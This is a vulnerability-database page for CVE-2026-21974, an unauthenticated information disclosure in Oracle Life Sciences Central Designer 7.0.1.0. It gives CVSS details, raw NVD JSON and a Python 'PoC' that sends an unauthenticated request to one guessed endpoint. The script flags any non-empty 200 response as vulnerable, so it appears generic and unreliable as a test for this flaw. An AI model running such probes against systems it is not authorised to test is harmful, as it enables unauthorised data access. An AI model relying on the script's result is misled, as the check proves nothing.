Security Vulnerability Report
CVE-2026-21974 CVSS 5.3 MEDIUM

CVE-2026-21974

Published: 2026-01-20 22:16:01
Last Modified: 2026-01-29 14:47:09

Description

Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:life_sciences_central_designer:7.0.1.0:*:*:*:*:*:*:* - VULNERABLE
Oracle Life Sciences Central Designer 7.0.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-21974 PoC - Oracle Life Sciences Central Designer Information Disclosure
# Target: Oracle Life Sciences Central Designer 7.0.1.0
# Vulnerability: Unauthenticated information disclosure via HTTP
import requests
import sys


def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2026-21974
    """
    # Common endpoints that might expose sensitive information
    endpoints = [
        "/ords/f"
    ]

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Accept": "application/json, text/html",
        "Connection": "close"
    }

    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2026-21974 PoC")

    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        print(f"\n[*] Testing endpoint: {url}")

        try:
            # Attempt to access potentially sensitive endpoints without authentication
            response = requests.get(url, headers=headers, timeout=10, verify=False)

            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Response Length: {len(response.text)}")

            # Check for indicators of successful information disclosure
            if response.status_code == 200:
                if len(response.text) > 0:
                    print(f"[!] Potential vulnerability detected - Unexpected data returned")
                    print(f"[+] Sample response (first 500 chars):\n{response.text[:500]}")
                    return True

        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")

    print("\n[*] Testing complete")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-21974-poc.py <target_url>")
        print("Example: python cve-2026-21974-poc.py https://target.example.com")
        sys.exit(1)

    target = sys.argv[1]
    check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21974", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:16:00.587", "lastModified": "2026-01-29T14:47:09.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Life Sciences Central Designer product of Oracle Health Sciences Applications (component: Platform). The supported version that is affected is 7.0.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Life Sciences Central Designer. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Life Sciences Central Designer accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Life Sciences Central Designer de Oracle Health Sciences Applications (componente: Platform). La versión compatible que está afectada es la 7.0.1.0. Una vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso de red vía HTTP comprometer Oracle Life Sciences Central Designer. Los ataques exitosos de esta vulnerabilidad pueden resultar en acceso de lectura no autorizado a un subconjunto de datos accesibles de Oracle Life Sciences Central Designer. Puntuación Base CVSS 3.1 de 5.3 (Impactos en la Confidencialidad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:life_sciences_central_designer:7.0.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "FD42C36C-1BB2-4A80-B997-1F9C1861D7A0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}